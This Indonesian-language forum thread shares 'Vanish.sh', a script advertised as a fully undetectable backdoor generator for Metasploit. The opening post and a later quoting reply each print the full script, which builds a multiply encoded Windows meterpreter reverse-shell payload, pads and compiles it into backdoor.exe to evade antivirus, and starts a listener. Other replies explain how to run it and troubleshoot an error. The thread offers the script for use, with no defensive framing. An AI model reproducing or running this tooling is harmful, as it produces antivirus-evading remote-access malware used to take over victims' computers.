Fully Undetectable Backdoor generator untuk Metasploit
#1
Security Lab dari india mengeluarkan tools baru untuk Metasploit namanya Vanish.sh
Langsung cekidot aja yah Angry

Pertama install dulu gcc nya

Code:
[email protected]:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Lalu copy script Vanish.sh dari sini
simpan dengan format Vanish.sh

Setelah selesai di install, script Vanish.sh tadi di copy-kan ke folder Metasploit folder yang berada di /pentest/exploits/framework.

Backdoor yang dibuat oleh Vanish.sh tidak terdeteksi oleh kebanyakan antivirus.

Selamat mencoba

Sumber

sekedar menambahkan, berikut listing kodenya:

Code:
#!/bin/bash
# check if file exist that is msfpayload, msfcli etc...
echo "************************************************************"
echo "    Fully Undetectable Metasploit Payload generaor Beta     "
echo "        Original Concept and Script by Astr0baby            "
# Thanks to astr0baby ;)
echo "     Stable Version of Script is Edited by Vanish3r         "
echo "    Video Tutorial by Vanish3r - www.securitylabs.in        "
echo " Powered by TheHackerNews.com and securitylabs.in           "
echo "************************************************************"
# run as root
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi
ping localhost -c 5 >nul

# Giving Fresh new start so removing old junk
rm -rf seclabs
# if  builtin type -p i686-w64-mingw32-gcc > /dev/null ; then
# else echo "Please install by Command: apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils"
# echo "exiting.....";  exit
# fi
echo "Network Device On your Computer :"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "Which Interface to use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "How many times you want to encode ? 1-20 : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "Current Ip is : $IP"
ping localhost -c 5 >nul
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir seclabs
mv test.c seclabs
cd seclabs
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup of junk useless files :P
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
rm -f nul

# compiling..
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe backdoor.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in seclabs subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
ping localhost -c 5 >nul
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E

Note: ane edit ditambahkan listing kode vanish.sh
Konspirasi

#2
ijin nyimak om :p
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#3
waduh, ini bisa create backdoor exe undetectable?
keren!
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#4
cara gunainnya dari metasploit gmn om?

#5
Spoiler! :

(12-14-2011, 12:36 AM)k41t0 Wrote: Security Lab dari india mengeluarkan tools baru untuk Metasploit namanya Vanish.sh
Langsung cekidot aja yah Angry

Pertama install dulu gcc nya

Code:
[email protected]:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Lalu copy script Vanish.sh dari sini
simpan dengan format Vanish.sh

Setelah selesai di install, script Vanish.sh tadi di copy-kan ke folder Metasploit folder yang berada di /pentest/exploits/framework.

Backdoor yang dibuat oleh Vanish.sh tidak terdeteksi oleh kebanyakan antivirus.

Selamat mencoba

Sumber


sekedar menambahkan, berikut listing kodenya:

Code:
#!/bin/bash
# check if file exist that is msfpayload, msfcli etc...
echo "************************************************************"
echo "    Fully Undetectable Metasploit Payload generaor Beta     "
echo "        Original Concept and Script by Astr0baby            "
# Thanks to astr0baby ;)
echo "     Stable Version of Script is Edited by Vanish3r         "
echo "    Video Tutorial by Vanish3r - www.securitylabs.in        "
echo " Powered by TheHackerNews.com and securitylabs.in           "
echo "************************************************************"
# run as root
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi
ping localhost -c 5 >nul

# Giving Fresh new start so removing old junk
rm -rf seclabs
# if  builtin type -p i686-w64-mingw32-gcc > /dev/null ; then
# else echo "Please install by Command: apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils"
# echo "exiting.....";  exit
# fi
echo "Network Device On your Computer :"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "Which Interface to use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "How many times you want to encode ? 1-20 : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "Current Ip is : $IP"
ping localhost -c 5 >nul
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir seclabs
mv test.c seclabs
cd seclabs
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup of junk useless files :P
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
rm -f nul

# compiling..
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe backdoor.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in seclabs subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
ping localhost -c 5 >nul
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E

Note: ane edit ditambahin pada post pertama dari TS

#6
wuiih kren bro... ayo +1 +1 .. mantap om ane ijin pelajari dulu ya

#7
(12-14-2011, 11:12 AM)c0d3HitLER Wrote: cara gunainnya dari metasploit gmn om?

tinggal jalanin lewat terminal om..
masuk ke folder frameworknya trus jalanin pke perintah

Code:
[email protected]:~/pentest/exploits/framework# ./Vanish.sh

atau

Code:
[email protected]:~/pentest/exploits/framework# bash Vanish.sh

#8
(12-15-2011, 12:58 PM)k41t0 Wrote:
(12-14-2011, 11:12 AM)c0d3HitLER Wrote: cara gunainnya dari metasploit gmn om?

tinggal jalanin lewat terminal om..
masuk ke folder frameworknya trus jalanin pke perintah

Code:
[email protected]:~/pentest/exploits/framework# ./Vanish.sh

atau

Code:
[email protected]:~/pentest/exploits/framework# bash Vanish.sh

o gt thx Smile

#9
kog di saya.....

Spoiler! :
Code:
[email protected]:/pentest/exploits/framework$ ls
armitage       lib         msfconsole  msfmachscan  msfrpcd    scripts
data           modules     msfd        msfpayload   msfupdate  test
documentation  msf3        msfelfscan  msfpescan    msfvenom   tools
external       msfbinscan  msfencode   msfrop       plugins    Vanish
HACKING        msfcli      msfgui      msfrpc       README
[email protected]:/pentest/exploits/framework$ ./Vanish
bash: ./Vanish: /bin/bash^M: bad interpreter: No such file or directory
[email protected]:/pentest/exploits/framework$

Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#10
(12-15-2011, 02:19 PM)THJC Wrote: kog di saya.....

Spoiler! :
Code:
[email protected]:/pentest/exploits/framework$ ls
armitage       lib         msfconsole  msfmachscan  msfrpcd    scripts
data           modules     msfd        msfpayload   msfupdate  test
documentation  msf3        msfelfscan  msfpescan    msfvenom   tools
external       msfbinscan  msfencode   msfrop       plugins    Vanish
HACKING        msfcli      msfgui      msfrpc       README
[email protected]:/pentest/exploits/framework$ ./Vanish
bash: ./Vanish: /bin/bash^M: bad interpreter: No such file or directory
[email protected]:/pentest/exploits/framework$


ekstensi "sh" nya kq ga ada om..??






Users browsing this thread: 1 Guest(s)